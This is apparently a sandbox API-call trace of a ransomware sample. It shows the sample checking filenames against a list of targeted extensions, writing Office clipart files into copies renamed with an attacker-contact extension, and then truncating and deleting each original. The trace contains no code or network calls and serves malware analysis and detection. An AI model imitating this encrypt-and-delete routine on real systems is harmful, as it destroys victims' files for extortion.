	[0152.657] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.657] SetEndOfFile (hFile=0x3f0) returned 1
	[0152.659] CloseHandle (hObject=0x3f0) returned 1
	[0152.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.659] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf")) returned 1
	[0152.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.660] lstrlenW (lpString=".doc") returned 4
	[0152.660] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.660] lstrlenW (lpString=".docx") returned 5
	[0152.660] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0152.660] lstrlenW (lpString=".pdf") returned 4
	[0152.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.660] lstrlenW (lpString=".xls") returned 4
	[0152.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.660] lstrlenW (lpString=".xlsx") returned 5
	[0152.660] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0152.660] lstrlenW (lpString=".ppt") returned 4
	[0152.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.660] lstrlenW (lpString=".zip") returned 4
	[0152.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.660] lstrlenW (lpString=".rar") returned 4
	[0152.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.660] lstrlenW (lpString=".bz2") returned 4
	[0152.660] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.660] lstrlenW (lpString=".7z") returned 3
	[0152.660] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.660] lstrlenW (lpString=".dbf") returned 4
	[0152.660] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.660] lstrlenW (lpString=".1cd") returned 4
	[0152.661] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.661] lstrlenW (lpString=".jpg") returned 4
	[0152.661] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.661] lstrlenW (lpString=".doc") returned 4
	[0152.661] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString=".docx") returned 5
	[0152.661] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0152.661] lstrlenW (lpString=".pdf") returned 4
	[0152.661] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString=".xls") returned 4
	[0152.661] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.661] lstrlenW (lpString=".xlsx") returned 5
	[0152.661] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0152.661] lstrlenW (lpString=".ppt") returned 4
	[0152.661] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.661] lstrlenW (lpString=".zip") returned 4
	[0152.661] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.661] lstrlenW (lpString=".rar") returned 4
	[0152.661] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString=".bz2") returned 4
	[0152.661] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString=".7z") returned 3
	[0152.661] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.661] lstrlenW (lpString=".dbf") returned 4
	[0152.661] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.662] lstrlenW (lpString=".1cd") returned 4
	[0152.662] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned 63
	[0152.662] lstrlenW (lpString=".jpg") returned 4
	[0152.662] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.662] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.662] lstrlenW (lpString="J0099177.WMF") returned 12
	[0152.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0152.662] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=5386) returned 1
	[0152.662] CloseHandle (hObject=0x3f0) returned 1
	[0152.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf")) returned 0x20
	[0152.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0152.663] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.663] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0152.664] GetLastError () returned 0x0
	[0152.664] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x150a, lpOverlapped=0x0) returned 1
	[0153.118] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1510, lpOverlapped=0x0) returned 1
	[0153.119] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.119] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.119] SetEndOfFile (hFile=0x38c) returned 1
	[0153.119] CloseHandle (hObject=0x38c) returned 1
	[0153.119] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.119] SetEndOfFile (hFile=0x3f0) returned 1
	[0153.122] CloseHandle (hObject=0x3f0) returned 1
	[0153.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.287] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf")) returned 1
	[0153.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.350] lstrlenW (lpString=".doc") returned 4
	[0153.350] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.350] lstrlenW (lpString=".docx") returned 5
	[0153.350] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0153.351] lstrlenW (lpString=".pdf") returned 4
	[0153.351] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.351] lstrlenW (lpString=".xls") returned 4
	[0153.351] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.351] lstrlenW (lpString=".xlsx") returned 5
	[0153.351] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0153.351] lstrlenW (lpString=".ppt") returned 4
	[0153.351] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.351] lstrlenW (lpString=".zip") returned 4
	[0153.351] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.351] lstrlenW (lpString=".rar") returned 4
	[0153.351] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.351] lstrlenW (lpString=".bz2") returned 4
	[0153.351] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.351] lstrlenW (lpString=".7z") returned 3
	[0153.351] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.351] lstrlenW (lpString=".dbf") returned 4
	[0153.351] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.351] lstrlenW (lpString=".1cd") returned 4
	[0153.351] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.351] lstrlenW (lpString=".jpg") returned 4
	[0153.351] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.351] lstrlenW (lpString=".doc") returned 4
	[0153.352] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.352] lstrlenW (lpString=".docx") returned 5
	[0153.352] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0153.352] lstrlenW (lpString=".pdf") returned 4
	[0153.352] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.352] lstrlenW (lpString=".xls") returned 4
	[0153.352] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.352] lstrlenW (lpString=".xlsx") returned 5
	[0153.352] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0153.352] lstrlenW (lpString=".ppt") returned 4
	[0153.352] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.352] lstrlenW (lpString=".zip") returned 4
	[0153.352] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.352] lstrlenW (lpString=".rar") returned 4
	[0153.352] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.352] lstrlenW (lpString=".bz2") returned 4
	[0153.352] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.352] lstrlenW (lpString=".7z") returned 3
	[0153.352] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.352] lstrlenW (lpString=".dbf") returned 4
	[0153.352] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.352] lstrlenW (lpString=".1cd") returned 4
	[0153.352] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned 63
	[0153.352] lstrlenW (lpString=".jpg") returned 4
	[0153.352] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.353] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0153.353] lstrlenW (lpString="J0099181.WMF") returned 12
	[0153.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.480] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1198) returned 1
	[0153.480] CloseHandle (hObject=0x3ac) returned 1
	[0153.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf")) returned 0x20
	[0153.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.480] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.481] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0153.481] GetLastError () returned 0x0
	[0153.481] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4ae, lpOverlapped=0x0) returned 1
	[0153.519] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4b0, lpOverlapped=0x0) returned 1
	[0153.520] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.520] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.520] SetEndOfFile (hFile=0x3f0) returned 1
	[0153.520] CloseHandle (hObject=0x3f0) returned 1
	[0153.520] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.520] SetEndOfFile (hFile=0x3ac) returned 1
	[0153.522] CloseHandle (hObject=0x3ac) returned 1
	[0153.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.549] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf")) returned 1
	[0153.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.549] lstrlenW (lpString=".doc") returned 4
	[0153.549] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.549] lstrlenW (lpString=".docx") returned 5
	[0153.549] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0153.549] lstrlenW (lpString=".pdf") returned 4
	[0153.549] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.549] lstrlenW (lpString=".xls") returned 4
	[0153.550] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.550] lstrlenW (lpString=".xlsx") returned 5
	[0153.550] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0153.550] lstrlenW (lpString=".ppt") returned 4
	[0153.550] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.550] lstrlenW (lpString=".zip") returned 4
	[0153.550] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.550] lstrlenW (lpString=".rar") returned 4
	[0153.550] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.550] lstrlenW (lpString=".bz2") returned 4
	[0153.550] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.550] lstrlenW (lpString=".7z") returned 3
	[0153.550] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.550] lstrlenW (lpString=".dbf") returned 4
	[0153.550] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.550] lstrlenW (lpString=".1cd") returned 4
	[0153.550] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.550] lstrlenW (lpString=".jpg") returned 4
	[0153.550] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.550] lstrlenW (lpString=".doc") returned 4
	[0153.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.550] lstrlenW (lpString=".docx") returned 5
	[0153.550] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0153.550] lstrlenW (lpString=".pdf") returned 4
	[0153.551] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.551] lstrlenW (lpString=".xls") returned 4
	[0153.551] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.551] lstrlenW (lpString=".xlsx") returned 5
	[0153.551] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0153.551] lstrlenW (lpString=".ppt") returned 4
	[0153.551] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.551] lstrlenW (lpString=".zip") returned 4
	[0153.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.551] lstrlenW (lpString=".rar") returned 4
	[0153.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.551] lstrlenW (lpString=".bz2") returned 4
	[0153.551] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.551] lstrlenW (lpString=".7z") returned 3
	[0153.551] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.551] lstrlenW (lpString=".dbf") returned 4
	[0153.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.551] lstrlenW (lpString=".1cd") returned 4
	[0153.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 63
	[0153.551] lstrlenW (lpString=".jpg") returned 4
	[0153.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.551] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0153.551] lstrlenW (lpString="J0099183.WMF") returned 12
	[0153.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.558] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4946) returned 1
	[0153.558] CloseHandle (hObject=0x1b8) returned 1
	[0153.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf")) returned 0x20
	[0153.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.629] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.629] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0153.630] GetLastError () returned 0x0
	[0153.630] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1352, lpOverlapped=0x0) returned 1
	[0153.688] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1360, lpOverlapped=0x0) returned 1
	[0153.689] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.689] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.690] SetEndOfFile (hFile=0x3f0) returned 1
	[0153.690] CloseHandle (hObject=0x3f0) returned 1
	[0153.690] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.690] SetEndOfFile (hFile=0x3ac) returned 1
	[0153.692] CloseHandle (hObject=0x3ac) returned 1
	[0153.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
